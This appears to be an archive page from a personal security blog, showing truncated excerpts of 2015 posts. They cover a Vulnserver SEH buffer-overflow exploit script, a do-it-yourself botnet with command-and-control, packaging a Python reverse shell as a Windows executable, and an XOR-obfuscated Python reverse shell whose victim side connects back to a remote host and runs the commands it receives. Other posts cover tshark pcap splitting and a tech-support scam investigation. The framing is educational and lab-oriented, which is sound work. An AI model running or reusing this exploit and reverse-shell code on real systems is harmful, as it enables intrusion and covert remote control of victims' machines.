Showing posts from June, 2015

Vulnserver SEH Stack Based Overflow

The script below is what I wrote following the tutorial posted by InfoSec Institute for an SEH exploit located at the following link:

#!/usr/bin/python import socket server = '' # Change to the IP Address of Windows XP SP2 VM destPort = 9999 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, destPort)) # #bufCreated = "A"*4000 # /usr/share/metasploit-framework/tools/pattern_create.rb 4000 pattern = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap…

tshark and pcapline from Wesley McGrew

I came across where I wanted to separate out TCP streams and I found a couple of solutions that met my needs.  The first solution is using tshark and I found it at the following link and I have adapted and saved the bash script below:

#!/bin/bash # This is a script that seperates out based on a's of a pcap # Adapted from the script found at # Check to see if the argument for the pcap file has been supplied if [ $# -eq 0 ]; then echo "Usage: ./ file.pcap" echo exit else pcapFile=$1 fi # Create the output directory if it does not exist outputDir="output" if [ ! -d $outputDir ]; then mkdir output fi # Seperate the streams into seperate files for stream in `tshark -r ${pcapFile} -T fields -e | sort -n | uniq` do tshark -r ${pcapFile} -w $outputDir/stream-$stream.cap -Y "$stream" done
The second script was pcapline by Wesley McGre…

Miscreant Impersonating Century Link Technician - While I am Impersonating a Victim

This is a follow-up from the last post where I talked about a friends friend almost being victimized by scammers.  This post is meant to be used to educate others about scams like this that occur, the methods the miscreants make you do to demonstrate that your computer is infected and then to collect your credit card number.

I was provided the below phone number from a friend that had a friend almost become a victim of this scam:
(844) 409-6572
I decided I would impersonate a victim that needed his computer fixed.  So I called the number and was greeted by an automated system.  Then eventually a technician answered to greet me.  He proceeded to tell me that his name is "SUMIT RASTOGI" and that he can help me fix my computer.

He had me goto which redirects to "" where I proceeded to enter the 6 digit code of 546084.  He then proceeded to tell me that he was a Jr. Technician for "Windows Online Sup…

Miscreant Impersonated Century Link Technician - What did they do?

Recently a friend came to me and asked if I would be interested in looking at one of their friends computer.  The reason behind it was a miscreant, who impersonated Century Link, called and gained remote access to the computer.  With this access they proceeded to state they were fixing the computer.  After cloning the hard drive, these are the steps I took to analyze it.

First, to clone the drive I used a duplicator.  One of these can be found on Amazon for less than a $100 depending on the model and the features you get.  One such model can be found at this link and I have also included a picture below:

After the drive is cloned, I use an external enclosure to mount the drive.  Similar to the one at this link or below:

When you mount the drive verify that you mount it read only.  I am utilizing a Debian linux distro called Kali to conduct the analysis.  Initially when I plugged the drive in I saw the following:

The hard drive after plugging it in showed up as /dev/sdb and it auto-mo…

Create your own Botnet and Learn How to Detect its Activity in your Defenses (Updated v0.5)

With this post I want to provide information on how a botnet operates.  Then provide some code that can be used to simulate the botnet in action.  With the results then evaluate the defenses on how bot activity on a network could be detected.

Remember that this is a poor man's botnet and may not simulate some of the more sophisticated botnet's that currently are in operation.  There are security vulnerabilities in the code, do not use this in a production environment.

To begin there are multiple components to a botnet the first one I will start with is what is called a command and control server or often called a "C&C".  This is a server that is setup by the bot herder, or the person who is taking care of the botnet.  The term herder comes from the infected computers or the bots following him around.  The C&C server can also be a server that was compromised and being used for this activity.  All of the code found on this post can be downloaded from my google …

Setup pyinstaller on Windows 7

These are some quick notes on how I installed pyinstaller on Windows 7.

1. Installed Python 2.7 on Windows 7:

2. Installed the Python 2.7 for Windows Extensions:

3. Installed the Microsoft C++ for Python 2.7.

4. Installed the pip-Win to easily install packages:

5. Then after pip-Win is installed a dialogue box as shown in the below picture is left open. Then you can insert in the command box: "pip install pyinstaller"

6. After the pyinstaller package is successfully installed then from the command-line you can navigate to c:]python2.7\Scripts

7. Here is where you can find the pyinstaller.exe file.  Then you can run it accompanied by any script that has been created.  Below is the screenshot of creating my python reverse shell script located in a previous post into a windows executable.  With the co…

Python Reverse Shell - Modified from Primal Security Blog (Updated June 5)

The following Python reverse shell is taken from the Primal Security Blog located at the following link:

I modified the code so the XOR value, port and IP Addresses can be set as command line options on the server or as options on the client.  As long as the XOR value on the client and the server match the commands will run properly.  How I modified the python was from the information located at the following blog:

Server Code (Victim):
#!/usr/bin/python import socket,subprocess,sys if len(sys.argv) == 4: RHOST = sys.argv[1] RPORT = sys.argv[2] xorkey = sys.argv[3] xorkey = int(xorkey) s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((RHOST, int(RPORT))) while True: # recieve XOR encoded data from network socket data = s.recv(1024) # XOR the data again with a '\x41' to get back to normal data …